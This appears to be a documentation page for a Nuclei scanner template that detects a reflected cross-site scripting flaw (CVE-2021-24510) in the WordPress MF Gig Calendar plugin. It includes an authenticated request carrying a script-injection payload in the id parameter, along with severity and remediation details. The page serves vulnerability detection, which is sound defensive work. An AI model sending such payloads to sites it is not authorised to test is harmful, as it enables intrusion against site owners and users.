WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting
ID: CVE-2021-24510
Severity: medium
Author: dhiyaneshDK
Tags: cve2021,cve,wp-plugin,authenticated,wpscan,wordpress,mf_gig_calendar_project
Description
Section titled “Description”WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.
YAML Source
Section titled “YAML Source”id: CVE-2021-24510
info: name: WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting author: dhiyaneshDK severity: medium description: WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of WordPress MF Gig Calendar plugin (>=1.2) which includes proper input sanitization and validation. reference: - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39 - https://nvd.nist.gov/vuln/detail/CVE-2021-24510 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24510 cwe-id: CWE-79 epss-score: 0.00119 epss-percentile: 0.46132 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:* metadata: max-request: 2 vendor: mf_gig_calendar_project product: mf_gig_calendar tags: cve2021,cve,wp-plugin,authenticated,wpscan,wordpress,mf_gig_calendar_project
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="></script><script>alert(document.domain)</script><" HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '</script><script>alert(document.domain)</script>'
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 490a00463044022051a33fc26eefe2ae890aa0306db375366044b3661c028b35ac12da95e5db44c402207b6a211f42535367a303312cde239f609086dd2f161ad4699a4b607ceff20b41:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24510.yaml"